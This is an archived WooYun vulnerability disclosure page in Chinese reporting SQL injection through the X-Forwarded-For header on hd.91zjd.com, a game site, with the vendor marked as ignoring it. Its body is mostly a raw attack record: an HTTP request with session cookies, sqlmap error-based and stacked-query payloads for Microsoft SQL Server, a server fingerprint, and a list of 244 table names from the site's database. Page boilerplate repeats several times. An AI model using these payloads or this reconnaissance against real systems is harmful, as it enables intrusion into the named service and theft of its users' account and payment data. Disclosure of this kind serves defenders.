紫金岛游戏某站XForwardedFor存在SQL注入漏洞

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0204274

漏洞标题：紫金岛游戏某站XForwardedFor存在SQL注入漏洞

漏洞作者：路人甲

提交时间：2016-05-03 11:25

修复时间：2016-05-09 09:00

公开时间：2016-05-09 09:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：11

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-05-03：细节已通知厂商并且等待厂商处理中
2016-05-09：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

GET /Manage/Reg.aspx HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
X-Forwarded-For: q*
X-Requested-With: XMLHttpRequest
Referer: http://hd.91zjd.com/
Cookie: ASP.NET_SessionId=ibe25ph3xwts1fbihblpyjyf; PHPSESSID=cr8njnjl1mdsglra7j9gmmpd55; HMACCOUNT=E8E753AFF72A1AEA; CNZZDATA4909912=cnzz_eid%3D53645248-1461846717-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1461846717; Hm_lvt_13ddb2b3f776e22091a45a3f47d175d9=1461846714,1461846716; Hm_lpvt_13ddb2b3f776e22091a45a3f47d175d9=1461846716; bdshare_firstime=1461846715790; BAIDUID=3AA905FB43E5A681283C2869CC3F297A:FG=1; BAEID=AEB933863707154BAE91C97D8FD3C417:FG=1
Host: hd.91zjd.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: X-Forwarded-For #1* ((custom) HEADER)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: q' AND 9916=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (9916=9916) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(107)+CHAR(113))) AND 'kEJm'='kEJm
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: q';WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
Database: zjddb
[244 tables]
+-----------------------------------+
| FlashAd                           |
| JY_Aisoyo_class                   |
| SignInLogs                        |
| SignInRule                        |
| Sys_ProcErrorCollection           |
| TBankDeposit                      |
| TBankSerialRes                    |
| TBankSerialResource               |
| TBankWallet                       |
| TBattleMatchTable                 |
| TBattleRoomInfo                   |
| TChangeRecord                     |
| TChangeRecordUser                 |
| TCharmExchange                    |
| TContestInfo                      |
| TContestRecord                    |
| TContestRecord_New                |
| TContestUserRecord                |
| TFasciChangeRecord                |
| TGMRecord                         |
| TGM_OperationRecord               |
| TGameIPRule                       |
| TGameKindInfo                     |
| TGameLock                         |
| TGameNameInfo                     |
| TGamePropDefine                   |
| TGameRoomBase                     |
| TGameRoomInfo                     |
| TGameRoomMsg                      |
| TGameRoomTable                    |
| TGameServerInfo                   |
| TLockCode                         |
| TLoginRecord                      |
| TMatchTable                       |
| TMatchTableTest                   |
| TMoneyChangeRecord                |
| TMoneyExceptLog                   |
| TPropBuyGive                      |
| TPropDefine                       |
| TReceiveMoneyDefind               |
| TReceiveMoneyRecord               |
| TRoomIPRule                       |
| TRoomRecord                       |
| TSendMoneyRecord                  |
| TSendMoneyRecord_New              |
| TSignUp                           |
| TTransferRecord                   |
| TUserCallGM                       |
| TUserInfo                         |
| TUserList                         |
| TUserLoginGame                    |
| TUserNameRule                     |
| TUserProp                         |
| TUsers                            |
| TWLoginRecord                     |
| TZLoginRecord                     |
| T_InviteCodeRecord                |
| T_PhoneExchangeSet                |
| T_RewardConfig                    |
| T_RewardLog                       |
| T_RewardRecord                    |
| T_ShareConfig                     |
| T_Share_Invite_Log                |
| VChangeRecord                     |
| VPropGive                         |
| VRoomList                         |
| VUserBuy                          |
| VUserListReceive                  |
| VUserListSend                     |
| VUserProp                         |
| VUsers                            |
| VUsersAlbum                       |
| Web_AdminEmail                    |
| Web_AdminModifyLog                |
| Web_Agency                        |
| Web_AgencyAccountLog              |
| Web_AgencyBalanceLog              |
| Web_AgencyDayReport               |
| Web_AgencyMoneyChangeLog          |
| Web_AgencyPercentChange           |
| Web_AgencyPopeSet                 |
| Web_AgencyRMBCost                 |
| Web_AlmsConfig                    |
| Web_AlmsDrawLog                   |
| Web_AnalyData_DateOnline          |
| Web_Analy_DateReport              |
| Web_Analy_MonthReport             |
| Web_Analy_NewUserReport           |
| Web_ApplyVipRoom                  |
| Web_Award                         |
| Web_AwardClass                    |
| Web_AwardLog                      |
| Web_BuyClothLog                   |
| Web_Card                          |
| Web_CharmExchangeLog              |
| Web_ClearFasciPropDefine          |
| Web_ClearFasciPropUseLog          |
| Web_ClearingLog                   |
| Web_Clothes                       |
| Web_CompanyInfo                   |
| Web_Config                        |
| Web_ContestRank                   |
| Web_Count_AgencyOnline            |
| Web_Count_OnlineUsers             |
| Web_Count_RoomOnline              |
| Web_CreateID                      |
| Web_DataAnaly_Users               |
| Web_DataClearLog                  |
| Web_DayTaxReport                  |
| Web_Exchange                      |
| Web_FasciExchangeConfig           |
| Web_FasciExchangeLog              |
| Web_FineryID                      |
| Web_FriendLink                    |
| Web_GUID                          |
| Web_GameGuidList                  |
| Web_GameInfo                      |
| Web_GameMain                      |
| Web_GameType                      |
| Web_IndexFlash                    |
| Web_Link                          |
| Web_Log                           |
| Web_LotterAward                   |
| Web_LotterConfig                  |
| Web_LotterLog                     |
| Web_LotterSpecial                 |
| Web_LotteriesLog                  |
| Web_Manage_Model                  |
| Web_Manage_Popedom                |
| Web_MatchAwardConfig              |
| Web_MatchSendType                 |
| Web_MobilePayConfig               |
| Web_MobilePayGameType             |
| Web_MoneyChangeLog                |
| Web_MoneyStatEveryday             |
| Web_NewsData                      |
| Web_NewsType                      |
| Web_PConfig                       |
| Web_PVAndIPStat                   |
| Web_PlayerDayReport               |
| Web_PointChangeLog                |
| Web_PropChangeLog                 |
| Web_RMBCost                       |
| Web_RebateInfo                    |
| Web_System                        |
| Web_TGClearingRecord              |
| Web_TGPayRecord                   |
| Web_TaxStatEveryDay               |
| Web_TransLog                      |
| Web_TransfersAccount              |
| Web_TuiGuang                      |
| Web_TuiGuangLog                   |
| Web_UserAlbum                     |
| Web_UserAlbumColumn               |
| Web_UserApplyVipRecord            |
| Web_UserModifyLog                 |
| Web_Users                         |
| Web_VAgencyBalanceLog             |
| Web_VAgency_UserPayList           |
| Web_VAnalyData_DateOnline         |
| Web_VAnaly_AgencyDateReport       |
| Web_VAnaly_DateReport             |
| Web_VAnaly_GameCountAndTax        |
| Web_VAnaly_NewUserPayList         |
| Web_VAnaly_NewUserReport          |
| Web_VAnaly_PayList                |
| Web_VAnaly_UserList24A            |
| Web_VAnaly_UserList24B            |
| Web_VAnaly_UserListReg            |
| Web_VApplyVipRoom                 |
| Web_VBankDeposit                  |
| Web_VBuyClothLog                  |
| Web_VChangeRecord                 |
| Web_VCharmExchange                |
| Web_VDataList                     |
| Web_VFasciClearPropLog            |
| Web_VFasciExchangeLog             |
| Web_VGameKindList                 |
| Web_VGameNameInfo                 |
| Web_VGameRoomInfo                 |
| Web_VGameRoomInfo2                |
| Web_VGetAgencyDetail1             |
| Web_VGetPlayDetail                |
| Web_VGetUserOnline                |
| Web_VLotterLog                    |
| Web_VLotterSpecial                |
| Web_VMatchAwardConfig             |
| Web_VMatchLog                     |
| Web_VMatchLog_New                 |
| Web_VMatchTable                   |
| Web_VMoneyChangeRecord            |
| Web_VPropBuyGive                  |
| Web_VReceiveMoneyLog              |
| Web_VTContestRoom                 |
| Web_VTGLog                        |
| Web_VTuiGuang                     |
| Web_VUserBattlePoint              |
| Web_VUserGameMoney                |
| Web_VUsersList                    |
| Web_ValmsDrawRecord               |
| Web_manage_admin                  |
| Web_msg                           |
| Web_vAgencyAccountLog             |
| Web_vAgencyAndPlayerSumPoint_List |
| Web_vAgencyExchange               |
| Web_vAgencyList                   |
| Web_vAgencySpareValue             |
| Web_vAgencySpareValueLog          |
| Web_vAwardLog                     |
| Web_vAwardRecord                  |
| Web_vBankMoneyOpera               |
| Web_vBuyPropLog                   |
| Web_vBuyVipLog                    |
| Web_vExchangeFasciLog             |
| Web_vFaciSum                      |
| Web_vGameRecord                   |
| Web_vNewsList                     |
| Web_vPlayerSpareValue             |
| Web_vPropTotal                    |
| Web_vSendMoneyRecord_New          |
| Web_vTaxStatEveryday              |
| Web_vTransferLog                  |
| Web_vUserAlbumColumn              |
| Web_vUserAllMoneyChangeLog        |
| Web_vUserList                     |
| Web_vUserLoginList                |
| Web_vUserMoneyRank                |
| Web_vUserPoint                    |
| Web_vUserTime                     |
| TGM＿AwardType                     |
| sqlmapoutput                      |
| view_EveyMonthAnaly_monthReport   |
| view_PayByAnage                   |
| view_PayByAnageAaySuccess         |
| view_getNewsByTOPN                |
| web_AgencyAccount                 |
| web_AgencyRebateLog               |
| web_SystemMsg                     |
| web_UserMoneyChange               |
| web_VPayTotalRecord               |
| web_VPlayerLoginLog               |
| web_VTGBalanceLog                 |
| web_vGetVipLog                    |
| web_vTGpayClearing                |
+-----------------------------------+

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-05-09 09:00

厂商回复：

漏洞Rank：4 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0204274

漏洞标题：紫金岛游戏某站XForwardedFor存在SQL注入漏洞

相关厂商：91zjd.com

漏洞作者：路人甲

提交时间：2016-05-03 11:25

修复时间：2016-05-09 09:00

公开时间：2016-05-09 09:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：11

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0204274

漏洞标题：紫金岛游戏某站XForwardedFor存在SQL注入漏洞

相关厂商：91zjd.com

漏洞作者： 路人甲

提交时间：2016-05-03 11:25

修复时间：2016-05-09 09:00

公开时间：2016-05-09 09:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：11

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0204274"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云